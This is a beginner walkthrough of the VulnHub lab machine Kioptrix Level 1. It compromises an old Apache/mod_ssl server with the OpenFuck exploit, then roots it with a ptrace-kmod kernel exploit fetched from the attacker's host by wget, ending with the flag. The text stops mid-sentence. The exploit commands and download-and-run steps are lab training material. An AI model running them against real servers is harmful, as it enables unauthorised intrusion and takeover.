Kioptrix: Level 1 — VulnHub Walkthrough OpenFuck Apache Exploit to Root via ptrace/kmod

ROOM TYPE Difficulty → Beginner Platform → VulnHub Focus → Apache Exploitation, Local Privilege Escalation

Punih3r7

~2 min read · April 19, 2026 (Updated: April 19, 2026) · Free: Yes

We start by running Nikto against the target to identify the web server version and any known vulnerabilities:

nikto --host http://<target-ip>

Nikto reveals the web server is running:

Apache httpd 1.3.20 ((Unix) mod_ssl/2.8.4)

This is a very outdated version of Apache with a well-known vulnerability. We search for it on Exploit-DB.

We use searchsploit to locate the exploit locally:

searchsploit 47080

Before compiling, we install the required SSL development library:

apt-get install libssl-dev

We then compile the exploit:

gcc -o OpenFuck 47080.c -lcrypto

We first run the exploit without arguments to view the available target offset codes:

./OpenFuck

We identify two potential offsets for Apache 1.3.20 on Unix and try both:

./OpenFuck 0x6a <target-ip> -c 40-50
./OpenFuck 0x6b <target-ip> -c 40-50

The correct offset gives us a shell on the target. However, to fully escalate privileges we need an additional kernel exploit.

We download the ptrace/kmod local privilege escalation exploit from Packet Storm Security:

https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

In the same download folder, we find our attacking machine's IP address:

ifconfig

We serve the file over HTTP using Python:

python3 -m http.server 8000

From the shell we obtained via OpenFuck, we download the kernel exploit onto the target machine:

wget http://<attacker-ip>:8000/ptrace-kmod.c

We compile it directly on the target:

gcc -o exploit ptrace-kmod.c -B /usr/bin

Then we execute it to escalate to root:

./exploit

We now have a root shell.

Final Flag

cd /root
cat flag.txt

Final Thoughts

Kioptrix Level 1 is a classic beginner machine that simulates a real-world scenario of an unpatched server being exploited. It covers: